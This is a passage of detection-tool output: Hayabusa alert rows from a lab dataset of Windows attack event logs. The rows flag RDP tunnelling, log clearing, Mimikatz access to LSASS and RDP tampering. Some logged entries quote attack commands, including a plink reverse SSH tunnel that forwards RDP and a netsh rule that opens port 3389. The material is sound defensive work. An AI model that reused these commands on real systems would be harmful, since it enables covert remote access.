Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 